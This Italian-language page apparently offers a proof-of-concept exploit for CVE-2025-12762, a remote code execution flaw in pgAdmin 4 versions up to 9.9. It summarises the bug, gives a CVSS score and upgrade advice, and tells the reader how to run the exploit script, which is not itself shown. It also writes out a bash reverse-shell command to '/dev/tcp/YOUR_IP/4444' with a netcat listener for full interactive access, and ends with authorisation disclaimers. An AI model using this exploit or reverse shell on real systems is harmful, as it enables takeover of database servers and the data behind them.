
Exploit proof-of-concept per CVE-2025-12762, una RCE critica in pgAdmin 4 ≤ 9.9. Include analisi tecnica, CVSS 9.1 e reverse shell opzionale per test di penetrazione autorizzati.

Una vulnerabilità di Esecuzione Remota di Codice (RCE) esiste in pgAdmin 4 versioni ≤ 9.9. Gli aggressori possono eseguire comandi arbitrari sull'host quando pgAdmin è in esecuzione in modalità server e processa un dump SQL in formato PLAIN durante il ripristino.
🟥 9.1 / 10 — Critico
⬆️ Aggiornare a pgAdmin 4 v10.0 o successiva
pgAdmin è spesso utilizzato per l'amministrazione di database PostgreSQL critici, il che significa:
# 1. Save as CVE-2025-12762.py
# 2. Install dependency
pip3 install requests
# 3. Run it
python3 CVE-2025-12762.py
Dopo l'esecuzione, controlla:
docker exec <your-pgadmin-container> ls -la /tmp/CVE-2025-12762_PWNED
File esistente → Hai appena sfruttato CVE-2025-12762 per davvero.
Sostituisci la riga COMMAND con:
COMMAND = "bash -c 'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'"
Poi nc -lvnp 4444 → shell interattiva completa.
Questo è l'esatto script che ricercatori, pentester e red team stanno usando in tutto il mondo a novembre 2025.
Usalo responsabilmente. Aggiorna tutto. Rimani legale.
Questa PoC è fornita esclusivamente per test autorizzati e uso educativo.
Puoi eseguirla esclusivamente su sistemi di tua proprietà o per i quali hai esplicita autorizzazione scritta per i test.
Qualsiasi uso non autorizzato è illegale e viola le leggi sull'abuso informatico.
Usalo responsabilmente, aggiorna immediatamente dopo i test e non prendere mai di mira sistemi senza autorizzazione.